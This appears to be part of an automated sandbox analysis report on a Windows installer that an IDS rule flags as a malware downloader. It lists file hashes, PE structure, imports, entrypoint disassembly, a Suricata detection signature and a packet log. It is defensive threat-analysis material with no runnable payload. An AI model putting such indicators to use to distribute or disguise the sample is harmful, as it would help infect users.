                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                        Category:dropped
                                                        Size (bytes):898
                                                        Entropy (8bit):3.504861469259323
                                                        Encrypted:false
                                                        SSDEEP:12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMRz8RMJsW+slmYalzJCN85v4t2YZ2:8QudO/9Q6jd9a6/y3Nr24qy
                                                        MD5:92A17BC4BBB82ECB9494367095582DA2
                                                        SHA1:88D72BE0847424385217F00B79737EFFCB6C433A
                                                        SHA-256:F4AEBD33981F6EE35A4A7DEB9DC9E0C41868497B94E76A77F0BE2EE0D2194DA7
                                                        SHA-512:EB82976CCA3A8F1ACDE9B77ECB709AD4DA9EAAC9F460BBD4D90A00208F6AE29579FF041BA40334FFE8B898C58590BEB3EECC369EEBD023E45BAAE0DB941BB8DB
                                                        Malicious:false
                                                        Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.I.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.885499918962077
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:TEC-SPC-94.03.60.175.07.exe
                                                        File size:534'840 bytes
                                                        MD5:01b2b1469623862352f36c9a1d2ca1d5
                                                        SHA1:297d178ed13293b4ca95c731c08bef11266c4998
                                                        SHA256:72a691eae6f31fd6db1c1a5453ac5aad4b8b85d2747c5e668e761eb2e010d02a
                                                        SHA512:5affc393eea3499b31837f155de186b8f0d740f5a7cd49be27398448dbff4aef3e09dce90582546f741717f153e79561656cf35fa6101da65df49838788ba674
                                                        SSDEEP:12288:XRV78CR08V3IJEq6ZZTkwa81KuUG70SdlmgT0R7RR:Iw08V3iT8D1YM/6wy7RR
                                                        TLSH:D5B423447BE1E412C9E68E310FD3DAA9EAA8FD36483106865B2C2DBF79747C1453E391
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@

                                                        File Icon

                                                        Icon Hash:0714262e34390f06

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x40335a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 000002D8h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        xor ebp, ebp
                                                        pop esi
                                                        mov dword ptr [esp+18h], ebp
                                                        mov dword ptr [esp+10h], 00409230h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [00407034h]
                                                        push 00008001h
                                                        call dword ptr [004070BCh]
                                                        push ebp
                                                        call dword ptr [004072ACh]
                                                        push 00000009h
                                                        mov dword ptr [004292B8h], eax
                                                        call 00007F4F990CF5CAh
                                                        mov dword ptr [00429204h], eax
                                                        push ebp
                                                        lea eax, dword ptr [esp+38h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebp
                                                        push 004206A8h
                                                        call dword ptr [0040717Ch]
                                                        push 0040937Ch
                                                        push 00428200h
                                                        call 00007F4F990CF235h
                                                        call dword ptr [00407134h]
                                                        mov ebx, 00434000h
                                                        push eax
                                                        push ebx
                                                        call 00007F4F990CF223h
                                                        push ebp
                                                        call dword ptr [0040710Ch]
                                                        push 00000022h
                                                        mov dword ptr [00429200h], eax
                                                        pop edi
                                                        mov eax, ebx
                                                        cmp word ptr [00434000h], di
                                                        jne 00007F4F990CC6B9h
                                                        mov esi, edi
                                                        mov eax, 00434002h
                                                        push esi
                                                        push eax
                                                        call 00007F4F990CEC73h
                                                        push eax
                                                        call dword ptr [00407240h]
                                                        mov ecx, eax
                                                        mov dword ptr [esp+1Ch], ecx
                                                        jmp 00007F4F990CC7ABh
                                                        push 00000020h
                                                        pop edx
                                                        cmp ax, dx
                                                        jne 00007F4F990CC6B9h
                                                        inc ecx
                                                        inc ecx
                                                        cmp word ptr [ecx], dx

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x132d8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x5ec60x600060ec0c4d80dd6821cdaced6135eddfd5False0.6593424479166666data6.438901783265187IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x90000x202f80x60099cdd6cde9adee6bf3b24ee817b4574bFalse0.4830729166666667data3.8340327961758165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x4a0000x132d80x134006a5bbc33287fc34c026c3652aab40ca4False0.7685800527597403data6.977243320980138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x4a4480xb1b3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9923501351915763
                                                        RT_ICON0x556000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4311203319502075
                                                        RT_ICON0x57ba80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.48053470919324576
                                                        RT_ICON0x58c500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5330490405117271
                                                        RT_ICON0x59af80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5647540983606557
                                                        RT_ICON0x5a4800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6353790613718412
                                                        RT_ICON0x5ad280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5961981566820277
                                                        RT_ICON0x5b3f00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3176829268292683
                                                        RT_ICON0x5ba580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.42124277456647397
                                                        RT_ICON0x5bfc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6453900709219859
                                                        RT_ICON0x5c4280x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4274193548387097
                                                        RT_ICON0x5c7100x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4651639344262295
                                                        RT_ICON0x5c8f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5067567567567568
                                                        RT_DIALOG0x5ca200x100dataEnglishUnited States0.5234375
                                                        RT_DIALOG0x5cb200x11cdataEnglishUnited States0.6056338028169014
                                                        RT_DIALOG0x5cc400xc4dataEnglishUnited States0.5918367346938775
                                                        RT_DIALOG0x5cd080x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0x5cd680xbcdataEnglishUnited States0.601063829787234
                                                        RT_VERSION0x5ce280x1a4dataEnglishUnited States0.5642857142857143
                                                        RT_MANIFEST0x5cfd00x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                        USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                        ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                        ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-16T17:57:36.239478+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649776172.217.19.174443TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 16, 2024 17:57:33.616065025 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:33.616117954 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:33.616188049 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:33.628578901 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:33.628616095 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:35.329909086 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:35.329997063 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:35.330997944 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:35.331058025 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:35.399692059 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:35.399729967 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:35.400676966 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:35.400755882 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:35.408839941 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:35.455339909 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:36.239464998 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:36.239536047 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:36.239578009 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:36.239619017 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:36.239830971 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:36.239881039 CET44349776172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:36.239932060 CET49776443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:36.407639980 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:36.407689095 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:36.407758951 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:36.408088923 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:36.408106089 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:38.123538971 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:38.123672962 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:38.135392904 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:38.135422945 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:38.135690928 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:38.135763884 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:38.136157036 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:38.183343887 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:39.080641985 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:39.080688000 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:39.080785990 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:39.080809116 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:39.080837011 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:39.080848932 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:39.127685070 CET49784443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:39.127734900 CET44349784142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:39.277340889 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:39.277390003 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:39.277489901 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:39.277944088 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:39.277955055 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.973288059 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.973364115 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:40.974481106 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.974558115 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:40.976414919 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:40.976428032 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.976656914 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:40.976716042 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:40.977066994 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.023338079 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:41.889368057 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:41.889473915 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.889492989 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:41.889547110 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.889731884 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.889767885 CET44349790172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:41.889827013 CET49790443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:41.899274111 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:41.899321079 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:41.899404049 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:41.899736881 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:41.899753094 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:43.596498013 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:43.597616911 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:43.598176956 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:43.598196983 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:43.598401070 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:43.598416090 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.554001093 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.554095030 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.554152012 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:44.554161072 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.554152966 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:44.554254055 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:44.554826021 CET49796443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:44.554871082 CET44349796142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:44.683358908 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:44.683402061 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:44.683489084 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:44.683753014 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:44.683767080 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.376611948 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.376802921 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.377315044 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.377393007 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.379148006 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.379175901 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.379441977 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:46.379513979 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.379889011 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:46.427329063 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:47.285293102 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:47.285614967 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:47.285690069 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:47.285767078 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:47.285824060 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:47.285873890 CET44349807172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:47.285931110 CET49807443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:47.301189899 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:47.301294088 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:47.301384926 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:47.301641941 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:47.301676989 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:48.999551058 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:48.999658108 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.000005007 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.000020027 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.000272989 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.000286102 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.956948042 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957065105 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957091093 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957113981 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957137108 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957144976 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957154036 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957186937 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957201958 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957240105 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957247972 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:49.957284927 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957983017 CET49814443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:49.957999945 CET44349814142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:50.100584030 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:50.100641012 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:50.100727081 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:50.101129055 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:50.101142883 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.131942987 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.132148027 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.132675886 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.132839918 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.135041952 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.135071993 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.135361910 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:52.135431051 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.135746002 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:52.179358959 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045170069 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045411110 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.045444965 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045522928 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.045780897 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045805931 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.045830965 CET44349820172.217.19.174192.168.2.6
                                                        Dec 16, 2024 17:57:53.045857906 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.045885086 CET49820443192.168.2.6172.217.19.174
                                                        Dec 16, 2024 17:57:53.061923981 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:53.061955929 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:53.062040091 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:53.062408924 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:53.062422037 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:54.759212971 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:54.759351015 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:54.760328054 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:54.760333061 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:54.760584116 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:54.760586977 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:55.713773966 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:55.713886023 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:55.713902950 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:55.713948965 CET49826443192.168.2.6142.250.181.1
                                                        Dec 16, 2024 17:57:55.714036942 CET44349826142.250.181.1192.168.2.6
                                                        Dec 16, 2024 17:57:55.714080095 CET49826443192.168.2.6142.250.181.1
